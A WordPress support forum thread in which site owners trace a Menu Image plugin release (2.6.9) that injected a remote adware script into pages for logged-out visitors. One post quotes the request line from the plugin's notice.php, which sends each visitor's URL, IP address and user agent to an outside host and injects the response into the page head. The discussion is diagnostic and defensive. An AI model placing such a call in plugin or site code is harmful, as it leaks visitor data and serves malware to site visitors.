Moderator
Jan Dembowski
(@jdembowski)
Forum Moderator and Brute Squad
This has been verified by WPEngine.com Sucuri support.
What specifically did they verify? Where in the plugin does this occur?
It was a process of elimination.
First it is calling the JavaScript remotely.
We originally came across this malware Tuesday of last week. You would click links and it would take you to a popcash adware site. We only have three plugins on the site so there were only a few things…
The malware was only being applied from 10am CT to 1pm CT and is not visible if you are logged in as admin.
We basically went through a process of disabling the plugins on server side (no login) to see which one was causing added script.
We made 5 duplicate sites to confirm as knowing what is causing this was hugely important to our company. When we found disabling Menu Image caused the <script> to be removed (which was always at line 83 in my code regardless of which script ran). We then re-enabled and the script was re-applied. We tested on our different instances of the site with the same results. In the end with Everything else disabled, enabling and disabling Menu Image alone was causing the malicious script to be added.
I would be willing to give you more detail if needed or wanted.
Mike
In addition – the <script> is ONLY there sometimes. So testing all went on during the “visible” periods.
Hi.
I have the same problem please help.
Please, disable the Menu-Image plugin and remove it from your wordpress site at all and never use it in future. I think this will not solve your problem. All plugin code you can check here: https://github.com/zviryatko/menu-image, compare it with that you have.
zviryatko,
This is not an attack on you. But there is a hole in the code allowing it to be attacked. Removing your plugin from 3 of 5 installations, completely stopped the problem on the 3 while the last 2 are still displaying the problem.
Mike.
Mike:
I am seeing this as well. Out of curiosity, which version of the plugin are/were you running? We saw the behavior when running 2.6.9. While observing the behavior, we disabled this plugin and confirmed that the calls to the loader.js script which pushes server info were no longer included in site content. Re-enabling then brought them back. We subsequently updated to version 2.7.0 and the calls to loader.js are no longer included.
The reason I am curious about your version, is that if you are already on 2.7.0, then I can potentially expect to see something reintroduce the issue over time. The big change in that release according to the release notes (and reviewing git history) is “Remove notification plugin. It was not a good idea btw.”. If this is the trigger, then “not a good idea” indeed.
-craig
Craig,
I started seeing this on 2.6.9 and as part of the process I did update to 2.7.0 and I still see the problem. Make sure you are logged out of the admin account to verify.
I currently have 5 copies of my site to try different things and I am not seeing any difference between the 2.6.9 and 2.7.0.
Hope this helps.
Mike
Please provide list of plugins and theme that you using, would be great if you provide web-server access.log for that period where script is appear, and also helps if you share your link to your website. Send the list with attached log directly to email (you can find it in plugin description), do not post it here, I think you can add @jdembowski to copy.
Mike:
That’s interesting. While I have never actually experienced the popup/popunder ad issue, we did see the script call to the above referenced loader.js. Yesterday, that script was collecting site info, but today it is now also attempting to inject ad content (have only been testing with curl from a remote location, not actually using a browser). For us, at least so far, only 2.6.9 was injecting the loader.js script call. The URL hosting that file is what identified the issue as Google had flagged the impacted site as containing malware and disabled any associated adwords.
While testing today with a staging site, flipping back and forth between version 2.6.9 and 2.7.0 appears to make the loader.js content come and go. This prompted further investigation into what specfically was injecting the malware code. We narrowed it down to accelio_call_service and accelio_overlay in notice.php in version 2.6.9. The init method of AccelioNotice would make the below request to apistats DOT net during initialization, the response of which would then be injected in the header using add_action( ‘wp_head’, array( $this, ‘accelio_overlay’ ) ).
‘http://apistats DOT net/v1/stats/update?url=’ . urlencode( ‘http://’ . $http_host . $request_uri ) . ‘&ip=’ . urlencode( self::get_the_user_ip() ) . ‘&ua=’ . urlencode( $user_agent ) . ‘&id=m4ngf8’
If you hit the above URL, you will see that its response is now the loader.js URL, which in turn yields the bad things we have seen.
Given the above, I am quite confident that at least the issues that we were seeing were indeed caused by the inclusion of notice.php and its calls to apistats DOT net. I am quite puzzled as to why are are still seeing them after upgrading to 2.7.0 which removed notice.php. Hopefully the plugin author can help to shed some additional light on things.
-craig
I am quite puzzled as to why are are still seeing them after upgrading to 2.7.0 which removed notice.php. Hopefully the plugin author can help to shed some additional light on things.
Have no idea, in 2.7.0 “notice.php” should be absent, check it on your server via file manager in control panel or something, if it not try to remove it manually and then reinstall plugin (you image settings should kept).
We had the same issue on our website. It came up on Saturday as we got suspended from our Adwords account. I was not able to reproduce it but here‘s a screenshot of the console when it happened.
Right now, we have removed the plugin from our site and will send it to re-evaluation.
For anyone else who is encountering this issue, please update the plugin. the issue is no longer present.
exploit location: notice.php:
accelio_call_service
